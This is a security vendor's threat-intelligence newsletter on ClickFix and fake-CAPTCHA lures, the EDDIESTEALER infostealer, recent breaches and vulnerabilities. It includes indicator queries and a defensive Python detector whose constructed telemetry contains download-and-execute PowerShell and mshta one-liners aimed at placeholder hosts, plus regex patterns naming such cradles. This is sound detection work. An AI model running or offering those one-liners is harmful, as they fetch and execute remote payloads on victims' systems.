This week, we briefed our clients on new research that shows ClickFix & Fake CAPTCHA are thriving. We also discussed recent breaches that made the news.
KEY TAKEAWAYS
Cyber-extortion group Scattered Spider's campaign against the retail industry shifts its focus to the U.S. Learn their TTPs and how to protect against them.
Critical vulnerabilities in Fortinet, Cisco, SonicWall, Google Chrome, and ASUS. Patch now!
ClickFix & Fake CAPTCHA is an increasingly common technique used by threat actors to gain initial access. Threat actors either compromise legitimate websites or host their own sites that prompt the user to copy malicious code and trick them into running it on their own system.
Fig. 1: Fake CAPTCHA prompt | Source: Elastic Security
This technique is commonly used to deliver either infostealer malware or loader malware that further infects the victim with additional malicious payloads such as ransomware.
Fake CAPTCHA Pushes EDDIESTEALER
New research from Elastic Security details EDDIESTEALER, a new infostealer written in Rust that is being distributed via fake CAPTCHA sites. This infostealer targets user data including credentials, browser information, and cryptocurrency wallets. One notable detail in Elastic's research is EDDIESTEALER's ability to extract data from web browsers. The malware authors implemented a Rust-based version of ChromeKatz, a utility for dumping sensitive data from the memory of Chromium-based browsers. This allows the malware to harvest data such as cookies and session data. Elastic's research also shows EDDIESTEALER's ability to manipulate Chrome browsers into dumping plaintext credentials stored in its Password Manager.
Beyond ClickFix
Researchers at TrendMicro detailed a new campaign that is delivering Vidar and StealC infostealer malware via TikTok videos. The delivery method is a similar concept to ClickFix, where the user is tricked into running malicious code themselves via the Windows Run prompt. However, instead of a fake error message or fake CAPTCHA page that gives the user instructions, AI-generated videos on TikTok convince users to run the malicious code by claiming it will activate or unlock premium features in software. The end result is the same: the user is tricked into running malicious PowerShell code that downloads malware onto the victim's computer.
How to Protect Your Organization
Find it in PacketWatch
PacketWatch query for EDDIESTEALER C2 IPs:
*.ip:(45.144.53.145 OR 84.200.154.47)
PacketWatch query for EDDIESTEALER domain infrastructure:
http.host:(shiglimugli.xyz OR xxxivi.com OR llll.fit OR plasetplastik.com OR militrex.wiki)
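Both the fake CAPTCHA and the TikTok variant end the same way: the victim pastes a one-liner into the Windows Run prompt, so the interpreter starts as a direct child of explorer.exe. The following is an added example (not PacketWatch's code or query syntax) of endpoint-side detection logic that applies that observation to process-creation telemetry; the record shape, the host names and every command line are constructed for illustration.

```python
import re
from dataclasses import dataclass

# Process-creation record in the shape a Sysmon Event ID 1 or EDR feed provides (constructed).
@dataclass
class ProcEvent:
    host: str
    parent_image: str
    image: str
    command_line: str

# Run-prompt launches are children of explorer.exe; these are the interpreters lures ask for.
RUN_PROMPT_PARENT = "explorer.exe"
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Download-and-execute traits seen in ClickFix-style one-liners, each with a reason label.
CRADLE_PATTERNS = [
    (re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod)\b", re.I), "download cradle"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "in-memory execution"),
    (re.compile(r"-(e|ec|enc|encodedcommand)\b", re.I), "encoded command"),
    (re.compile(r"-w(indowstyle)?\s+hidden\b", re.I), "hidden window"),
    (re.compile(r"mshta\.exe\s+https?://", re.I), "mshta remote HTA"),
]

def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def score_event(ev):
    """Return the reasons an event looks like Run-prompt ClickFix execution; [] if benign."""
    if basename(ev.parent_image) != RUN_PROMPT_PARENT or basename(ev.image) not in INTERPRETERS:
        return []
    # explorer.exe -> powershell.exe alone is noisy (users open shells from Run);
    # require at least one cradle trait in the command line as well.
    return [label for pat, label in CRADLE_PATTERNS if pat.search(ev.command_line)]

def flag_clickfix(events):
    return [(ev.host, score_event(ev)) for ev in events if score_event(ev)]

# Constructed sample telemetry; the URLs use the reserved .invalid TLD and resolve nowhere.
SAMPLE = [
    ProcEvent("WS01", r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -c "iwr http://example.invalid/x | iex"'),
    ProcEvent("WS02", r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              "mshta.exe https://example.invalid/verify.hta"),
    ProcEvent("WS03", r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell"),  # a user simply opening a shell from Run
    ProcEvent("WS04", r"C:\Program Files\Microsoft VS Code\Code.exe", r"C:\Windows\System32\cmd.exe",
              "cmd /c npm test"),  # interpreter, but not launched from explorer.exe
]

if __name__ == "__main__":
    for host, reasons in flag_clickfix(SAMPLE):
        print(host, reasons)
```

The same parent/child test is a useful pivot in PacketWatch or any EDR console; the pasted commands also remain in each user's RunMRU registry key for forensic confirmation.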
ConnectWise
On May 28, ConnectWise disclosed that they had observed suspicious activity in their ScreenConnect cloud environment which they believe is tied to a nation-state actor. The notification states it impacted only a small number of customers, and that each impacted customer has been notified directly by ConnectWise. While the advisory did not disclose exactly how the intrusion happened, it does contain several mentions of a patch released on April 24 for CVE-2025-3935. Administrators are advised to ensure they patch ScreenConnect to version 25.2.4 or higher. PacketWatch will continue to monitor this incident for further details.
LexisNexis
LexisNexis Risk Solutions, a data analytics company used by the majority of Fortune 500 companies, disclosed that threat actors stole PII for over 364,000 individuals in December 2024. The PII includes name, phone number, email address, postal address, social security number, driver's license number and date of birth. Investigation of the breach shows the data was harvested from GitHub (third-party infrastructure) and not from LexisNexis itself.
Vulnerability Roundup
A pair of medium-severity vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM) version 12.5.0.0 and earlier was disclosed on May 15. Tracked as CVE-2025-4427 and CVE-2025-4428, these vulnerabilities can be chained together to achieve unauthenticated remote code execution (RCE). Research from EclecticIQ shows these vulnerabilities were actively exploited as zero-days by a Chinese espionage group tracked as UNC5221. Proof-of-concept exploit code for these vulnerabilities is also in the wild. Administrators are urged to patch as soon as possible. Because Ivanti products are heavily targeted by threat actors due to a multitude of high- and critical-severity vulnerabilities in recent years, organizations that choose to continue using this product should monitor it closely for unusual activity.
The following vulnerabilities were added to CISA's Known Exploited Vulnerabilities Catalog in the last 2 weeks:
This report is provided FREE to the cybersecurity community.
NOTE
We have enhanced our report with data from SOCRadar. You may need to register to view their threat intelligence content.
DISCLAIMER
Kindly be advised that the information contained in this article is presented with no final evaluation and should be considered raw data. The sole purpose of this information is to provide situational awareness based on the currently available knowledge. We recommend exercising caution and conducting further research as necessary before making any decisions based on this information.